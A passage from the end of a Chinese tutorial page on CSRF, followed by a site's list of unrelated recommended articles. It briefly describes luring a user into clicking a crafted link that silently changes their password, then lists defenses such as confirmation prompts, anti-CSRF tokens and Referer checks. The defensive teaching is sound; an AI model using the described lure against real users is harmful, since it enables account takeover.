然后将链接http://www.bb.com/wwww.html发送给用户,诱使他点击链接,一旦他点击,则密码就会被修改

 防御

1.二次确认(如删除用户,转账等重要操作弹窗要求用户确认)
2.Token认证
  GET操作请求:可以在Cookie中存储Token
  POST操作请求:可以在form表单中添加一个隐藏的input标签,value值为Token
3.验证Referer

资料

https://security.tencent.com/index.php/blog/msg/24

4_CSRF的更多相关文章

随机推荐

  1. Selenium webdriver定位iframe里面元素两种方法

    以东方财富网登录页面为例: 在查找元素过程中,直接通过id或者xpath等找不到元素,查看页面源代码发现元素是属于iframe里,例如: <div class="wrap_login& ...

  2. Docker与KVM之间的区别

    一.Docker简介 Docker 项目的目标是实现轻量级的操作系统虚拟化解决方案. Docker 的基础是 Linux 容器(LXC)等技术. 在 LXC 的基础上 Docker 进行了进一步的封装 ...

  3. Codeforces_776E: The Holmes Children (数论 欧拉函数)

    题目链接 先看题目中给的函数f(n)和g(n) 对于f(n),若自然数对(x,y)满足 x+y=n,且gcd(x,y)=1,则这样的数对对数为f(n) 证明f(n)=phi(n) 设有命题 对任意自然 ...

  4. (转)面试大总结之一:Java搞定面试中的链表题目

    面试大总结之一:Java搞定面试中的链表题目 分类: Algorithm Interview2013-11-16 05:53 11628人阅读 评论(40) 收藏 举报 链表是面试中常出现的一类题目, ...

  5. python之二维码生成

    生成的二维码只是网址的链接 直接上代码: import qrcode title = input("要生成的内容:") img = qrcode.make(title) with ...

  6. 【javascript】ajax的参数

    1. 常用参数 url type: contentType: dataType: data: success: error 2. 特殊参数 context: 这个对象用于设置Ajax相关回调函数的上下 ...

  7. 【echart】学习笔记

    1.  x 轴 y轴 的max  min 只能为5的倍数 2.

  8. 【nodejs】nodejs 的linux安装(转)

    (一) 编译好的文件 简单说就是解压后,在bin文件夹中已经存在node以及npm,如果你进入到对应文件的中执行命令行一点问题都没有,不过不是全局的,所以将这个设置为全局就好了. ./node -v ...

  9. 基于.NET CORE微服务框架 -谈谈Cache中间件和缓存降级

    1.前言 surging受到不少.net同学的青睐,也提了不少问题,提的最多的是什么时候集成API 网关,在这里回答大家最近已经开始着手研发,应该在1,2个月内会有个初版API网关,其它像Token身 ...

  10. 基于jQuery开发的手风琴插件 jquery.accordion.js

     1.插件代码 少说多做,基于jQuery的手风琴插件jquery.accordion.js的代码:  /* * 手风琴插件说明: * 1.treeTrunk对应树干 * 2.treeLeaf对应树叶 ...